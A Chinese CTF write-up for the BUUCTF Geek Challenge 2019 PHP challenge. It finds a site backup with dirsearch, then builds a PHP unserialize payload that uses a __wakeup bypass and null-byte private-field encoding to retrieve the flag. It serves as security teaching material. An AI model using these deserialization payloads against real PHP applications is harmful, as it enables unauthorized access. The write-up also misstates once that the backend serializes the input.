姿势
提示:有一个良好的备份网站的习惯
故使用dirsearch工具扫描目录
得到的扫描结果中包含www.zip目录
通过url路径下载zip文件:
index.php中含有关键代码:
<?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>
Get传参传入一个参数select,后端将其序列化
class.php:
<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can't give you the flag!"; die(); } } } ?>
construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。
分析以上代码可知,当password为100,username为admin时即可获得flag
故以get传参为跳板构造原始POC:
?select=O:4:"Name":2:{s:13:"Name username";s:5:"admin";s:13:"Name password";i:100;}其中
4表示Name类的长度 2表示类中传入对象的个数,即username和password两个对象 13表示Name username和Name password的字符串长度 5与100表示传参的数据类型分别为string和int
接着开始完善POC:
进行反序列化之前则会先调用wakeup方法,当序列化字符串中对象个数的值大于真实个数时会跳过wakeup方法的执行,故POC可改为:
?select=O:4:"Name":3:{s:13:"Name username";s:5:"admin";s:13:"Name password";i:100;}
回显如下:
哪里还没考虑到?
如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化
故POC可改为
?select=O:4:"Name":3:{s:13:"Name%00username";s:5:"admin";s:13:"Name%00password";i:100;}
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)
故POC改为
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
回显如下:
总结
以上为[网络安全/CTF] BUUCTF 极客大挑战 2019 PHP 解题详析,考察Dirsearch工具的使用及php反序列化知识点,读者可躬身实践。
我是秋说,我们下次见。